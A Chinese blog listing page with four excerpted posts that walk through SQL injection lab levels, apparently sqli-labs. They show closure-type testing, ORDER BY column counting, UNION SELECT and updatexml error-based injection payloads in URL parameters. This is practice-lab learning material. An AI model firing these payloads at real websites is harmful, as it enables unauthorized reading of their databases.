摘要:
判断闭合 双引号 没有回显,用报错注入。 这题和less5大致一样只是将闭合改了。 所以我就只附个码了 ?id=1\ ?id=1" order by 3--+ ?id=1" and updatexml(1,concat(0x7e,database()),3) -- a ?id=1" and upda 阅读全文
posted @ 2023-05-23 20:56
dai呆
阅读(25)
评论(0)
推荐(0)
摘要:
一样的,还是先看是什么闭合类型 这个是单引号闭合的 然后再判断字长的时候发现这个并没有回显,所以我们就无法使用联合注入了 但是我们在判断他是什么闭合类型的时候还是会报错,所以我们可以使用报错注入 这个主要是使用updatexml函数 简单讲一下这个函数,这个函数有三个参数,但是我们并不需要关注第一个 阅读全文
posted @ 2023-05-23 20:33
dai呆
阅读(22)
评论(0)
推荐(0)
摘要:
首先判断闭合类型。 为双引号括号类型闭合。 然后后面的和前面的是一样的。 附个码 ?id=1\ ?id=1") order by 3--+ ?id=1") order by 4--+ ?id=-1") union select 1,2,3--+ ?id=-1") union select 1,dat 阅读全文
posted @ 2023-05-23 18:43
dai呆
阅读(22)
评论(0)
推荐(0)
摘要:
首先判断是什么闭合的类型, 可以看出来是‘)的闭合类型。 然后看是多少个字段的。 可以看出是3个字段的长度。 然后判断是哪几个回显。 可以看出来是第二位和第三位,其实写到这我也不想写了,因为后面的是和之前的一样的。 贴一下码 ?id=1\ ?id=1') order by 3--+ ?id=1') 阅读全文
posted @ 2023-05-23 18:32
dai呆
阅读(24)
评论(0)
推荐(0)
浙公网安备 33010602011771号